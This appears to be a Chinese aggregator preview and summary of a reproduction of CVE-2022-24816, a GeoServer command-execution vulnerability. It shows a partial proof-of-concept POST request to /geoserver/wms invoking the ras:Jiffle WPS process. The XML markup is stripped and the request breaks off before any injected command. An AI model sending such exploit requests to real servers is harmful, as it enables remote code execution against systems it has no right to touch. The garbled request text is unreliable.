主要观点总结
文章描述了关于CVE-2022-24816的geoserver命令执行漏洞的复现信息。
关键观点总结
关键观点1: 漏洞名称及CVE编号
该文章讨论的是关于geoserver的CVE-2022-24816命令执行漏洞。
关键观点2: 访问地址及协议
可以通过http://127.0.0.1/geoserver/ows来访问此漏洞。
关键观点3: 请求方法
文章中使用的是POST方法,路径为/geoserver/wms。
关键观点4: 请求头部信息
请求头包含了Host、Content-Type、Accept-Encoding等信息,并且编码使用UTF-8。
关键观点5: 请求内容示例
文章提供了一个请求内容的示例,包括ras:Jiffle和图像格式(image/tiff)的结果。
文章预览
漏洞复现 CVE-2022-24816,geoserver命令执行漏洞 访问:http://127.0.0.1/geoserver/ows poc POST /geoserver/wms HTTP/1.1 Host: xxxxxxxxx Content-Type: application/xml Accept-Encoding: gzip, deflate "1.0" encoding= "UTF-8" ?> "1.0.0" service= "WPS" xmlns:xsi= "http://www.w3.org/2001/XMLSchema-instance" xmlns= "http://www.opengis.net/wps/1.0.0" xmlns:wfs= "http://www.opengis.net/wfs" xmlns:wps= "http://www.opengis.net/wps/1.0.0" xmlns:ows= "http://www.opengis.net/ows/1.1" xmlns:gml= "http://www.opengis.net/gml" xmlns:ogc= "http://www.opengis.net/ogc" xmlns:wcs= "http://www.opengis.net/wcs/1.1.1" xmlns:xlink= "http://www.w3.org/1999/xlink" xsi:schemaLocation= "http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd" > ras:Jiffle "image/tiff"> result
………………………………